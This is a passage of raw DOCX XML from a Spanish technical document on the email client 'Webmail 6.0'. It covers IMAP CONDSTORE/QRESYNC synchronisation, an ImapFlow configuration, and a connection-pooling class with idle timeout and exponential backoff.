          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MODSEQ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) con cada mensaje. El cliente almacena el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HIGHESTMODSEQ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">conocido y en la siguiente sincronización solicita solo mensajes con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MODSEQ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mayor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">A001 FETCH 1:* (FLAGS) (CHANGEDSINCE 123456789)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esto devuelve únicamente los mensajes cuyos flags han cambiado desde la última sincronización, típicamente una fracción minúscula del mailbox total.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">QRESYNC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">extiende CONDSTORE para reconexiones eficientes. El cliente proporciona su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UIDVALIDITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UIDNEXT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HIGHESTMODSEQ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">conocidos, y el servidor responde con: lista de UIDs que han desaparecido (eliminados/expurgados), lista de UIDs nuevos, y lista de mensajes con flags modificados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[39]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">imapflow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">habilita estas extensiones automáticamente cuando el servidor las anuncia en su capacidad. La configuración de Webmail 6.0 establece</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qresync: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en las opciones del cliente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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ImapFlow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'imap.gmail.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">993</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">secure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auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> oauthToken }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">qresync</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Habilitar QRESYNC si disponible</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">maxIdleTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">60000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// 29 minutos, reiniciar IDLE antes del timeout</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emitLogs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="164"/>
    <w:bookmarkEnd w:id="165"/>
    <w:bookmarkStart w:id="169" w:name="connection-pooling"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.4 Connection Pooling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Las conexiones IMAP son relativamente costosas de establecer (handshake TLS, login, selección de carpeta). Crear una nueva conexión para cada operación degradaría severamente el rendimiento y rápidamente agotaría los límites de conexiones permitidos por los proveedores.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="166" w:name="Xe86366db689d3c88d7d973a1f85a96114f2e418"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.4.1 Singleton pattern, timeout 5min, backoff exponencial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Webmail 6.0 implementa un gestor de conexiones IMAP basado en el patrón Singleton que reutiliza conexiones dentro de una ventana de tiempo y aplica backoff exponencial ante fallos de conexión</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[137]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ImapConnectionPool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pools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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ImapClient</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lastUsed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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> number</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readonly IDLE_TIMEOUT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5 minutos</w:t>
      </w:r>
      <w:r>
        <w:br/>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getConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Credentials)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ImapClient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pools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(accountId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> lastUse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lastUsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(accountId)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(existing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">existing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">closed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</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lastUse)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IDLE_TIMEOUT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lastUsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(accountId</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existing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Crear nueva conexión</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>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ImapFlow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">logger</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connect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pools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client)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lastUsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(accountId</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'close'</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pools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(accountId))</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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>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release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> string)</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Keyword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pools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(accountId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (client </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">closed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">) {</w:t>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logout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pools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(accountId)</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El timeout de 5 minutos de inactividad equilibra reutilización de conexiones con liberación temprana de recursos del servidor IMAP. El backoff exponencial se aplica ante errores de conexión: 1 segundo tras el primer fallo, 2 segundos tras el segundo, 4, 8, 16, hasta un máximo de 60 segundos entre reintentos.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="166"/>
    <w:bookmarkStart w:id="167" w:name="límites-gmail-250-outlook-20"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.4.2 Límites: Gmail 250, Outlook 20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cada proveedor de email impone límites estrictos de conexiones IMAP simultáneas por cuenta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[137]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2178"/>
        <w:gridCol w:w="4356"/>
        <w:gridCol w:w="1386"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Proveedor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Límite conexiones IMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Notas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
